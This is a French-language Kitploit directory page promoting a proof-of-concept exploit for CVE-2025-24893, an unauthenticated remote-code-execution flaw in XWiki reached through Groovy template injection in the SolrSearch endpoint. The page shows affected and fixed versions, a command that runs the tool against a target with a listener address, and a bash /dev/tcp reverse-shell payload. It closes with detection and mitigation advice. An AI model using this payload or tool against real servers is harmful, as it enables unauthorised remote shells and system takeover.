Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/investigato/cve-2025-24893-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubinvestigato/cve-2025-24893-poc

cve-2025-24893-poc

Exploit de preuve de concept pour CVE-2025-24893, une vulnérabilité d'exécution de code à distance non authentifiée dans XWiki. Exploite une faille d'injection de template dans le point de terminaison SolrSearch via l'exécution de scripts Groovy.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24893 — RCE non authentifiée sur XWiki (PoC)

Exploit de preuve de concept pour CVE-2025-24893, une vulnérabilité critique non authentifiée d'exécution de code à distance (RCE) dans XWiki.
Cet exploit abuse d'une injection de template Groovy dans le point de terminaison SolrSearch pour exécuter des commandes arbitraires — y compris des shells inversés — sans authentification.

💥 Détails de la vulnérabilité

Une faille dans la façon dont XWiki traite une entrée malveillante destinée au point de terminaison RSS SolrSearch permet aux attaquants d'injecter du code Groovy dans le pipeline de rendu.
Cela permet une RCE non authentifiée via des blocs de script {{groovy}}.

✅ Versions affectées

  • < 15.10.11
  • >= 16.0.0 et
< 16.4.1

❌ Corrigé dans

  • 15.10.11
  • 16.4.1

🔧 Utilisation

Téléchargez la release :

Releases

ou compilez depuis les sources :

root@kitploit:~
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444

Charge utile de shell inversé

Il existe une charge utile de shell inversé préconstruite sous cette forme :

bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1


⚠️ Avertissement légal

Ce code est destiné uniquement à la recherche en sécurité éducative et autorisée.
N'utilisez pas cet exploit contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test.


✍️ Crédits

  • Exploit PoC par Artemir7
  • Portage Rust par investigato

🛡️ Détection et atténuation

  • Mettez à jour vers XWiki 15.10.11 ou 16.4.1+
  • Surveillez l'utilisation suspecte de /bin/get/Main/SolrSearch?media=rss
  • Désactivez l'exécution de Groovy pour les utilisateurs anonymes si possible
Télécharger l’outil